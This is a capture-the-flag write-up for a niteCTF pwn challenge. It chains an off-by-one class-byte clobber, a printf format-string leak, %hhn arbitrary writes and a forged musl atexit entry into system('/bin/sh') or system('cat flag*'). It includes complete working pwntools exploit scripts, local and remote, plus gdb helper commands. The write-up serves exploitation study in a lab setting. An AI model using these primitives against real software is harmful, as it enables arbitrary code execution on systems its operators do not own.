Skip to content

SECURE_CONNECTION//PRESS[CTRL+J]FOR ROOT ACCESS

BACK TO INTEL
PwnMedium

Beating Yellow King With Musl In Ng

CTF writeup for Beating Yellow King With Musl In Ng from niteCTF

//Beating Yellow King With Musl In Ng

This writeup covers the full solve path from zero → local exploit → remote exploit.

  • Target: chall (ELF64)
  • Libc: bundled libc.so (musl, and the binary uses it as the interpreter)
  • Remote: ncat --ssl yellow.chals.nitectf25.live 1337

The core idea is:

  1. Use a logic bug to force a “class” byte to 0.
  2. Reach a format string sink: printf(user_input).
  3. On musl, printf’s varargs pull extra “arguments” out of our stack buffer, letting us smuggle a pointer.
  4. Use %hhn for byte-wise arbitrary write.
  5. Hijack musl’s atexit handler list so program exit calls system("/bin/sh") (local), or system("cat flag*") (remote, non-interactive).

>1) Local Recon

1.1 The binary runs with the provided musl

The handout includes:

  • chall
  • libc.so

The important detail: chall is built to run with the provided musl (its ELF interpreter points to ./libc.so).

This matters because:

  • glibc assumptions (especially printf internals like positional arguments) often break on musl.
  • exploitation becomes “musl-specific”, not glibc-specific.

1.2 Protections and constraints

From basic inspection:

  • Non-PIE binary (fixed .text, fixed .bss).
  • NX enabled.
  • Stack canary enabled.
  • FULL RELRO (no GOT overwrites).
  • ASLR enabled (libc base changes each run).

So we need a reliable leak + a write primitive.


>2) Bugs

2.1 “Class clobber” logic bug (heap off-by-one style)

The program allocates a 0x21-byte chunk for each character:

  • bytes [0..0x1f]: name buffer (32 bytes)
  • byte [0x20]: class (1 byte)

The code reads the name with read(0, buf, 0x20), then writes a NUL terminator at buf[n].

If we provide exactly 32 bytes, then n == 0x20 and the NUL terminator is written to buf[0x20] which is actually the class byte.

So by sending a 32-byte name, we set:

  • class = 0

This unlocks the vulnerable message path.

2.2 Format string: printf(buf)

Once class is 0, an action menu leads to:

  • read up to 0x30 bytes into a stack buffer
  • call printf(buffer) (no format string)

Constraints:

  • Input size: 0x30 bytes
  • It enforces at most 13 % characters
  • The program mixes scanf() and read() → you must keep I/O synchronized (interactive-style send/recv).

>3) Musl-specific printf behavior (the key insight)

With glibc you might reach for positional specifiers like %7$p, %10$hhn, etc.

Here, positional specifiers are unreliable / don’t behave as expected. Instead, we abuse how musl fetches varargs when the call-site provides none.

At the call-site for printf(buf), only the format pointer is provided. That means:

  • rsi, rdx, rcx, r8, r9 are effectively “whatever the function had” (in this challenge they end up 0)
  • when musl keeps reading more variadic “args”, it starts pulling from the stack

Empirically, for this challenge:

  • arg1..arg6 are 0
  • arg7 looks like a libc pointer
  • arg8..arg13 come directly from our 0x30-byte stack buffer, interpreted as QWORDs

That means if our message buffer looks like:

buf[0x00..0x07] -> arg8 buf[0x08..0x0f] -> arg9 buf[0x10..0x17] -> arg10 buf[0x18..0x1f] -> arg11 buf[0x20..0x27] -> arg12 buf[0x28..0x2f] -> arg13

So we can place a pointer at buf+0x28 and force %s / %hhn to use it by consuming the preceding args.

This is the entire exploit.


>4) Building primitives

4.1 Confirm vararg smuggling

I used small scripts to understand the vararg stream and the buffer mapping.

  • scan_args.py prints 13 %p to see what args look like.
  • fmt_fuzz.py brute-forces where a tail QWORD shows up.

Once we know arg8+ is our buffer, we stop relying on “tail after NUL” alignment hacks and just place the pointer at a fixed offset.

4.2 Memory leak: read printf@got using %s

Because the binary is FULL RELRO, the GOT is read-only but still perfect for leaking resolved addresses.

Plan:

  1. Put printf@got into arg13.
  2. Print 12 “dummy” args with %p to consume up to arg12.
  3. Use %s which now dereferences arg13.

Format string used:

  • '%p'*12 + '|' + '%s'

Then parse bytes after |.

This gives printf’s runtime address and therefore:

  • libc_base = printf_addr - libc.symbols['printf']

4.3 Arbitrary write (byte-wise): %hhn

We want a clean, predictable character count.

Trick:

  • use eleven %c → prints exactly 11 characters and consumes args1..11
  • use %<pad>c → prints pad characters (consumes arg12)
  • use %hhn → writes low byte of the printed count into *(arg13)

Printed count becomes 11 + pad.

So to write byte b:

  • pad = (b - 11) % 256 (and if pad=0, use 256)

Now we have a reliable write_hhn(where, byte) primitive.


>5) Endgame: hijack musl atexit

Classic format-string endgames are often:

  • overwrite GOT
  • overwrite return address
  • stack pivot + ROP

But here:

  • GOT is read-only
  • stack is protected by canary
  • message buffer is tiny

Instead, we exploit musl’s atexit mechanism.

musl stores a global head pointer to an exit-handler list plus a slot counter.

During normal execution the program registers an exit handler; when the program exits, musl executes:

  • __funcs_on_exit()

That walks the list and does:

  • load func[i] from head + 0x8 + i*8
  • load arg[i] from head + 0x108 + i*8
  • call func[i](arg[i])

So if we can do two things:

  1. Build a fake “atexit node” in the binary’s .bss (fixed address because non-PIE)
  2. Overwrite musl globals head and slot to point to it

Then on exit, musl will call:

  • system(arg0)

5.1 Offsets used

These offsets came from disassembling musl’s __cxa_atexit / __funcs_on_exit in the provided libc.so.

  • head at libc_base + 0x0c0d88
  • slot at libc_base + 0x0c0fa4

We place our fake node at a fixed .bss address:

  • fake = 0x404200

Fake node layout we write:

  • (fake + 0x0) = 0 (next = NULL)
  • (fake + 0x8) = system
  • (fake + 0x108) = ptr_to_command_string

5.2 Local vs remote

  • Local: arg0 = "/bin/sh" → interactive shell.

  • Remote: we want non-interactive output. So we set:

    arg0 = "cat flag* 2>/dev/null; cat /flag 2>/dev/null"

Then we trigger menu option 3 (exit), and musl runs our handler.


>6) How to run

Local

python3 solve_local.py

It drops you into a shell.

Remote (non-interactive)

python3 solve_remote.py

Optional overrides:

  • HOST=yellow.chals.nitectf25.live PORT=1337 python3 solve_remote.py
  • LOG=error python3 solve_remote.py (quiet)

>7) Flag (remote)

The remote run prints:

nite{b34TinG_yeLl0wk1ng_1n_ng+_w1thNo$$s}

//Solver / helper code

Everything below is the exact code used during the solve.

>A.1 explore.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF("./chall", checksec=False)
context.log_level = "info"

def make_char(io, idx: int, cls: int, name: bytes):
    io.recvuntil(b">>")
    io.sendline(b"1")
    io.recvuntil(b"enter index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b">>")  # class prompt ends with >>
    io.sendline(str(cls).encode())
    io.recvuntil(b">>")  # name prompt ends with >>
    if len(name) != 32:
        raise ValueError("name must be exactly 32 bytes to clobber class")
    # TTY/pty input is often line-buffered; include a newline so read() completes.
    # read(0, buf, 0x20) will take the 32 bytes and leave the newline for later.
    io.send(name + b"\\n")

def defeat_and_message(io, idx: int, msg: bytes) -> bytes:
    io.recvuntil(b">>")
    io.sendline(b"2")
    io.recvuntil(b"enter index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"leave..")
    # program uses read(0, buf, 0x30) and then printf(buf); use a marker to delimit output
    if b"%" in msg and msg.count(b"%") > 13:
        raise ValueError("too many %; must be <= 13")
    marker = b"|END"
    if marker in msg:
        raise ValueError("msg already contains marker")
    if b"\\x00" in msg:
        raise ValueError("msg must not contain NUL bytes")
    wire = msg + marker + b"\\x00"
    # Include a newline to satisfy canonical-mode reads on a pty.
    if len(wire) > 0x2F:
        raise ValueError("message too long (need room for newline in 0x30 read)")
    io.send(wire + b"\\n")
    io.recvuntil(b"The message left for other adventurers..")
    io.recvline()  # consume puts() newline
    out = io.recvuntil(marker, timeout=1)
    return out or b""

def main():
    io = process(["./chall"])

    # Create a character and clobber its class byte to 0 by giving a 32-byte name.
    make_char(io, idx=0, cls=1, name=b"A" * 32)

    # Leak stack values in small chunks (message buffer is only 0x30 bytes).
    chunk = 6
    for base in range(1, 121, chunk):
        parts = [f"%{i}$p".encode() for i in range(base, base + chunk)]
        msg = b".".join(parts)
        leak = defeat_and_message(io, idx=0, msg=msg)
        print(f"[{base:03d}-{base+chunk-1:03d}] {leak.decode('latin-1','replace').strip()}")

    io.close()

if __name__ == "__main__":
    main()

>A.2 find_offset.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

MARK1 = 0xdeadbeefcafebabe
MARK2 = 0x1122334455667788

def setup(io):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(b'0')
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\\n')

def send_msg(io, fmt: bytes, tail: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(b'0')
  io.recvuntil(b'leave..')

  wire = fmt + b'\\x00' + tail
  if wire.count(b'%') > 13:
    raise ValueError('too many %')
  if len(wire) > 0x2F:
    raise ValueError('too long')
  io.send(wire + b'\\n')

  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  tail = p64(MARK1) + p64(MARK2)

  for n in range(1, 14):
    fmt = b'.'.join([b'%p'] * n)
    out = send_msg(io, fmt, tail)
    s = out.decode('latin-1', 'replace').strip('\\n')
    hit1 = ('deadbeefcafebabe' in s)
    hit2 = ('1122334455667788' in s)
    print(f'n={n:2d} out={s!r} hit1={hit1} hit2={hit2}')

  io.close()

if __name__ == '__main__':
  main()

>A.3 fmt_fuzz.py

python
#!/usr/bin/env python3
from pwn import *

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

MARK = 0xdeadbeefcafebabe

def setup(io):
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'>>'); io.send(b'A'*32 + b'\\n')

def send_msg(io, msg: bytes) -> bytes:
  io.recvuntil(b'>>'); io.sendline(b'2')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'leave..')
  io.send(msg + b'\\n')
  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  # We want printf() to eventually treat our tail QWORD as the next vararg.
  # We brute-force small paddings and number of consumed args.
  for pad_len in range(0, 9):
    pad = b'A' * pad_len
    for n in range(1, 14):
      # Keep <=13 '%' total.
      fmt = (b'%p' * n) + b'|'  # '|' separator so output is parseable
      # Place tail after NUL so we can include zeros.
      # Total <= 0x2f bytes (leave room for newline) because action reads 0x30.
      tail = p64(MARK)
      wire = pad + fmt + b'\\x00' + tail
      if wire.count(b'%') > 13:
        continue
      if len(wire) > 0x2f:
        continue
      out = send_msg(io, wire)
      if b'deadbeefcafebabe' in out:
        print(f'HIT pad={pad_len} n={n} out={out!r}')
        io.close()
        return
  print('No hit found within search bounds')
  io.close()

if __name__ == '__main__':
  main()

>A.4 scan_args.py

python
#!/usr/bin/env python3
from pwn import *
import re

context.binary = ELF('./chall', checksec=False)
context.log_level = 'error'

def setup(io):
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'>>'); io.sendline(b'1')
  io.recvuntil(b'>>'); io.send(b'A'*32 + b'\\n')

def do_msg(io, fmt: bytes, tail: bytes=b'') -> bytes:
  io.recvuntil(b'>>'); io.sendline(b'2')
  io.recvuntil(b'enter index:'); io.sendline(b'0')
  io.recvuntil(b'leave..')
  wire = fmt + b'\\x00' + tail
  if wire.count(b'%') > 13:
    raise ValueError('too many %')
  if len(wire) > 0x2f:
    raise ValueError('too long')
  io.send(wire + b'\\n')
  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def main():
  io = process(['./chall'])
  setup(io)

  fmt = b'|'.join([b'%p'] * 13) + b'|END'
  out = do_msg(io, fmt)
  s = out.decode('latin-1', 'replace')
  print(s)

  vals = re.findall(r'0x[0-9a-fA-F]+', s)
  print('hexes:', vals)
  stackish = [v for v in vals if v.lower().startswith('0x7ff')]
  print('stackish:', stackish)

  io.close()

if __name__ == '__main__':
  main()

>A.5 exploit_local.py (experimental)

python
#!/usr/bin/env python3
from pwn import *

BIN_PATH = './chall'
LIBC_PATH = './libc.so'

context.binary = ELF(BIN_PATH, checksec=False)
context.log_level = 'info'

elf = context.binary
libc = ELF(LIBC_PATH, checksec=False)

# These were derived empirically:
# - With our message buffer in action(), the first controlled QWORD placed AFTER the NUL terminator
#   can be consumed as a variadic argument, but alignment depends on where it lands in the 0x30 buffer.
# - In practice the variadic arguments come from:
#     arg1..arg5: rsi, rdx, rcx, r8, r9 (all 0 at the call-site)
#     arg6..arg7: stack at rsp, rsp+8
#     arg8..     : our 0x30-byte message buffer at rdi (rsp+0x10)
#   Specifically:
#     arg8  = buf[0:8]
#     arg9  = buf[8:16]
#     arg10 = buf[16:24]
#     arg11 = buf[24:32]
#     arg12 = buf[32:40]
#     arg13 = buf[40:48]
# - Using four "%*c" (consuming 8 args) plus two "%c" (consuming 2 args) consumes 10 args
#   using only 6 '%' characters, leaving room for multiple %n writes.
CONSUME_10 = b'%*c%*c%*c%*c%c%c'

def build_msg(fmt: bytes, qwords_at: dict[int, int]) -> bytes:
  """Build the exact 0x30-byte message buffer for action()'s read().

  We force the NUL terminator inside the first 24 bytes so arg11+ can contain arbitrary
  QWORDs (including NUL bytes) without affecting the format string.
  """
  buf = bytearray(b'B' * 0x30)
  if b'\\x00' in fmt:
    raise ValueError('format string must not contain NUL')
  if len(fmt) >= 24:
    raise ValueError('format string must be < 24 bytes to keep arg11 area free')
  buf[:len(fmt)] = fmt
  buf[len(fmt)] = 0

  for off, val in qwords_at.items():
    if off % 8 != 0:
      raise ValueError('qword offsets must be 8-byte aligned')
    if off < 0 or off + 8 > 0x30:
      raise ValueError('qword offset out of range')
    buf[off:off+8] = p64(val)
  return bytes(buf)

def make_char_zero_class(io, idx: int = 0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  if len(payload) != 0x30:
    raise ValueError('payload must be exactly 0x30 bytes (action reads 0x30)')

  io.send(payload + b'\\n')
  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def leak_bytes(io, ptr: int, nbytes: int = 8) -> bytes:
  """Leak up to nbytes from memory at ptr using %.*s.

  Note: This is string-based and will stop early at NUL.
  We wrap output between markers for parsing.

  Arg layout:
    - consume 10 args
    - %.*s uses arg11 (precision int), arg12 (char*)
  """
  marker1 = b'<'
  marker2 = b'>'

  # consume 10 args, then %.*s consumes:
  #   arg11: precision (int)
  #   arg12: pointer
  fmt = CONSUME_10 + marker1 + b'%.*s' + marker2
  payload = build_msg(
    fmt,
    {
      24: nbytes,
      32: ptr,
    },
  )

  out = send_message(io, 0, payload)
  try:
    start = out.rindex(marker1) + 1
    end = out.rindex(marker2)
  except ValueError:
    raise RuntimeError(f'Failed to parse leak markers in output: {out!r}')
  return out[start:end]

def u64_leak(partial: bytes) -> int:
  data = partial.ljust(8, b'\\x00')
  return u64(data)

def main():
  io = process([BIN_PATH])
  make_char_zero_class(io, idx=0)

  printf_got = elf.got['printf']
  log.info(f'printf@got = {hex(printf_got)}')

  printf_leak = leak_bytes(io, printf_got, 8)
  log.info(f'printf@got raw bytes: {printf_leak!r}')
  printf_addr = u64_leak(printf_leak)
  log.info(f'printf runtime addr = {hex(printf_addr)}')

  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc base = {hex(libc_base)}')

  environ_addr = libc_base + libc.symbols['environ']
  envp_ptr_bytes = leak_bytes(io, environ_addr, 8)
  envp_ptr = u64_leak(envp_ptr_bytes)
  log.info(f'environ (char**) = {hex(envp_ptr)} (bytes={envp_ptr_bytes!r})')

  # Try to locate our action() stack buffer by scanning downward from envp_ptr.
  # We look for the literal substring of our format-string prefix.
  found = None
  needle = CONSUME_10[:8]
  for step in [0x1000, 0x100, 0x20, 0x8]:
    if found is None:
      start = envp_ptr
    else:
      start = found
    # scan within 0x400000 each pass
    for off in range(0, 0x400000, step):
      addr = start - off
      try:
        s = leak_bytes(io, addr, 0x60)
      except Exception:
        continue
      if needle in s:
        found = addr
        log.info(f'Found stack marker near {hex(found)} (step={hex(step)})')
        break

  if found is None:
    log.warning('Did not find MAGIC marker by stack scan.')
  else:
    log.info(f'Candidate stack buffer addr ~ {hex(found)}')

  io.close()

if __name__ == '__main__':
  main()

>A.6 solve_local.py (final local exploit)

python
#!/usr/bin/env python3
from pwn import *

BIN = './chall'
LIBC = './libc.so'

context.binary = ELF(BIN, checksec=False)
elf = context.binary
libc = ELF(LIBC, checksec=False)

context.log_level = 'info'

# musl printf varargs observed in this challenge:
# - arg1..arg6 are 0
# - arg7 is a libc-ish pointer
# - arg8+ are sourced from the action() stack buffer (48 bytes) starting at buffer+0
#   i.e. arg8->buf+0, arg9->buf+8, ..., arg13->buf+40.
# We place our controlled pointer at arg13 to give enough format-string room for
# width digits while still staying under the 0x30-byte read.
ARG_INDEX = 13
PTR_OFF = 8 * (ARG_INDEX - 8)  # 40
MAX_READ = 0x30

# --- interaction helpers ---

def make_char_zero_class(io, idx=0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A'*32 + b'\\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  # action() reads 0x30 bytes.
  # We append a newline after the payload; read() will consume up to 0x30 bytes and
  # leave the newline for the next prompt.
  if len(payload) > 0x30:
    raise ValueError('payload too long')

  io.send(payload + b'\\n')
  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=1)
  return out

def craft_with_ptr(fmt: bytes, ptr: int) -> bytes:
  """Craft a payload where ptr is placed at arg13 (buf+40).

  Layout in the 0x30 buffer:
    [0..len(fmt)-1] fmt bytes
    [len(fmt)]      NUL terminator
    [.. PTR_OFF-1]  filler 'X'
    [PTR_OFF..]     ptr qword
  """
  if b'\\x00' in fmt:
    raise ValueError('fmt must not contain NUL')
  if len(fmt) >= PTR_OFF:
    raise ValueError('fmt too long to place ptr at fixed offset')
  filler_len = PTR_OFF - (len(fmt) + 1)
  payload = fmt + b'\\x00' + (b'X' * filler_len) + p64(ptr)
  if len(payload) > MAX_READ:
    raise ValueError('payload exceeds 0x30 read budget')
  return payload

def leak_ptr(io, addr: int, max_bytes: int = 16) -> bytes:
  """Leak bytes at addr using %s with ptr in arg13."""
  # 12 specs to consume args1..12, then %s uses arg13.
  fmt = (b'%p' * 12) + b'|' + b'%s'
  out = send_message(io, 0, craft_with_ptr(fmt, addr))
  if b'|' not in out:
    return b''
  leak = out.split(b'|', 1)[1]
  return leak[:max_bytes]

def write_hhn(io, where: int, byte_val: int):
  """Write one byte to *where using %hhn with ptr in arg13.

  We consume args1..11 with eleven "%c" (each prints exactly 1 char),
  then use "%<pad>c" as arg12 (prints pad chars), then "%hhn" uses arg13.
  Total printed count = 11 + pad.
  """
  assert 0 <= byte_val <= 0xFF
  pad = (byte_val - 11) % 256
  if pad == 0:
    pad = 256
  fmt = (b'%c' * 11) + f'%{pad}c%hhn'.encode()
  send_message(io, 0, craft_with_ptr(fmt, where))

def write_qword(io, where: int, value: int):
  for i in range(8):
    write_hhn(io, where + i, (value >> (8*i)) & 0xFF)

def main():
  io = process([BIN])
  make_char_zero_class(io, 0)

  # Leak printf@got -> libc base
  printf_got = elf.got['printf']
  leak = leak_ptr(io, printf_got, max_bytes=8)
  log.info(f'printf@got leak bytes: {leak!r}')
  printf_addr = u64(leak.ljust(8, b'\\x00'))
  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc_base = {hex(libc_base)}')

  system_addr = libc_base + libc.symbols['system']
  binsh_addr = libc_base + 0xa4f60  # from strings -t x libc.so

  head_addr = libc_base + 0xc0d88
  slot_addr = libc_base + 0xc0fa4

  fake = 0x404200  # writable .bss in non-PIE binary

  log.info(f'system={hex(system_addr)} /bin/sh={hex(binsh_addr)}')
  log.info(f'head={hex(head_addr)} slot={hex(slot_addr)} fake={hex(fake)}')

  # Build fake atexit block (0x208 bytes expected by musl)
  # Layout used by __funcs_on_exit:
  #   [0x0] next
  #   [0x8 + i*8] func[i]
  #   [0x108 + i*8] arg[i]
  write_qword(io, fake + 0x0, 0)
  write_qword(io, fake + 0x8, system_addr)
  write_qword(io, fake + 0x108, binsh_addr)

  # Point head to our fake block and set slot=1.
  write_qword(io, head_addr, fake)
  # slot is a 32-bit int
  write_hhn(io, slot_addr + 0, 1)
  write_hhn(io, slot_addr + 1, 0)
  write_hhn(io, slot_addr + 2, 0)
  write_hhn(io, slot_addr + 3, 0)

  log.info('Triggering exit to run atexit handlers...')
  io.recvuntil(b'>>')
  io.sendline(b'3')

  io.interactive()

if __name__ == '__main__':
  main()

>A.7 solve_remote.py (final remote exploit, non-interactive)

python
#!/usr/bin/env python3
from pwn import *
import os

BIN = './chall'
LIBC = './libc.so'

context.binary = ELF(BIN, checksec=False)
elf = context.binary
libc = ELF(LIBC, checksec=False)

# Keep output minimal but informative.
context.log_level = os.environ.get('LOG', 'info')

HOST = os.environ.get('HOST', 'yellow.chals.nitectf25.live')
PORT = int(os.environ.get('PORT', '1337'))

# musl printf varargs observed in this challenge:
# - arg1..arg6 are 0
# - arg7 is a libc-ish pointer
# - arg8+ are sourced from the action() stack buffer (48 bytes) starting at buffer+0
#   i.e. arg8->buf+0, arg9->buf+8, ..., arg13->buf+40.
ARG_INDEX = 13
PTR_OFF = 8 * (ARG_INDEX - 8)  # 40
MAX_READ = 0x30

def make_char_zero_class(io, idx=0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  if len(payload) > MAX_READ:
    raise ValueError('payload too long')

  io.send(payload + b'\\n')
  io.recvuntil(b'The message left for other adventurers..\\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=3)
  return out

def craft_with_ptr(fmt: bytes, ptr: int) -> bytes:
  if b'\\x00' in fmt:
    raise ValueError('fmt must not contain NUL')
  if len(fmt) >= PTR_OFF:
    raise ValueError('fmt too long to place ptr at fixed offset')
  filler_len = PTR_OFF - (len(fmt) + 1)
  payload = fmt + b'\\x00' + (b'X' * filler_len) + p64(ptr)
  if len(payload) > MAX_READ:
    raise ValueError('payload exceeds 0x30 read budget')
  return payload

def leak_ptr(io, addr: int, max_bytes: int = 16) -> bytes:
  fmt = (b'%p' * 12) + b'|' + b'%s'
  out = send_message(io, 0, craft_with_ptr(fmt, addr))
  if b'|' not in out:
    return b''
  leak = out.split(b'|', 1)[1]
  return leak[:max_bytes]

def write_hhn(io, where: int, byte_val: int):
  assert 0 <= byte_val <= 0xFF
  pad = (byte_val - 11) % 256
  if pad == 0:
    pad = 256
  fmt = (b'%c' * 11) + f'%{pad}c%hhn'.encode()
  send_message(io, 0, craft_with_ptr(fmt, where))

def write_qword(io, where: int, value: int):
  for i in range(8):
    write_hhn(io, where + i, (value >> (8 * i)) & 0xFF)

def write_bytes(io, where: int, data: bytes):
  for i, b in enumerate(data):
    write_hhn(io, where + i, b)

def solve_once() -> bytes:
  io = remote(HOST, PORT, ssl=True, sni=HOST)

  make_char_zero_class(io, 0)

  # Leak printf@got -> libc base
  printf_got = elf.got['printf']
  leak = leak_ptr(io, printf_got, max_bytes=8)
  log.info(f'printf@got leak bytes: {leak!r}')
  printf_addr = u64(leak.ljust(8, b'\\x00'))
  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc_base = {hex(libc_base)}')

  system_addr = libc_base + libc.symbols['system']
  head_addr = libc_base + 0xc0d88
  slot_addr = libc_base + 0xc0fa4

  fake = 0x404200
  cmd_addr = fake + 0x180

  # Non-interactive: call system("cat flag*") directly.
  cmd = b'cat flag* 2>/dev/null; cat /flag 2>/dev/null\\n\\x00'

  log.info(f'system={hex(system_addr)} head={hex(head_addr)} slot={hex(slot_addr)}')

  # Fake atexit block
  write_qword(io, fake + 0x0, 0)
  write_qword(io, fake + 0x8, system_addr)
  write_qword(io, fake + 0x108, cmd_addr)
  write_bytes(io, cmd_addr, cmd)

  # Redirect musl atexit state
  write_qword(io, head_addr, fake)
  write_hhn(io, slot_addr + 0, 1)
  write_hhn(io, slot_addr + 1, 0)
  write_hhn(io, slot_addr + 2, 0)
  write_hhn(io, slot_addr + 3, 0)

  log.info('Triggering exit...')
  io.recvuntil(b'>>')
  io.sendline(b'3')

  # Collect output until the service closes or times out.
  data = io.recvall(timeout=3)
  io.close()
  return data

def main():
  out = solve_once()
  if out:
    # Print raw; flags often include newlines.
    print(out.decode('utf-8', errors='replace'), end='')

if __name__ == '__main__':
  main()

>A.8 gdb_cmds.txt

set pagination off set disassembly-flavor intel break *0x401657 run < gdb_input.bin printf "\\n--- regs at call-site ---\\n" info registers rdi rsi rdx rcx r8 r9 rsp rbp printf "\\n--- stack around rsp ---\\n" x/40gx $rsp printf "\\n--- message buffer (rdi) ---\\n" x/80bx $rdi printf "\\n--- bytes from rsp+0x0..0x80 ---\\n" x/128bx $rsp quit

>A.9 gdb_cmds2.txt

set pagination off break *0x401657 run < gdb_input.bin printf "BUF=%p\\n", $rdi # environ is in libc; should resolve printf "ENVIRON_SYM=%p\\n", environ x/gx environ printf "ENV_PTR=%p\\n", *(void**)environ printf "DELTA(envp_ptr-buf)=%ld\\n", (long)(*(void**)environ) - (long)$rdi quit